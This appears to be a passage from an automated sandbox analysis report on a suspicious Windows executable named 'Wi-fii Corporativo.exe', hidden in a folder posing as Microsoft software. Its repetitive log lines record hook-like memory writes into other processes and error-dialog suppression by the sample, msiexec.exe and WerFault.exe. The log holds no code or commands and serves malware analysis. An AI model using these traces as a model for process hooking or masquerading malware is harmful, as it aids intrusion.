    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 75A74D90 value: E9 7A B2 A7 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 6720005 value: E9 EB EB 36 6F Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 75A8EBF0 value: E9 1A 14 C9 90 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 6730005 value: E9 8B 8A 72 6F Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 75E58A90 value: E9 7A 75 8D 90 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 6740005 value: E9 2B 02 74 6F Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 75E80230 value: E9 DA FD 8B 90 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: A70005 value: E9 8B 2F 48 76 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 76EF2F90 value: E9 7A D0 B7 89 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: A80005 value: E9 2B BA 43 76 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 76EBBA30 value: E9 DA 45 BC 89 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: A90008 value: E9 8B 8E 47 76 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 76F08E90 value: E9 80 71 B8 89 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: AF0005 value: E9 8B 4D F8 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 75A74D90 value: E9 7A B2 07 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: B00005 value: E9 EB EB F8 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 75A8EBF0 value: E9 1A 14 07 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: B10005 value: E9 8B 8A 34 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 75E58A90 value: E9 7A 75 CB 8A Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: B20005 value: E9 2B 02 36 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 5508 base: 75E80230 value: E9 DA FD C9 8A Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
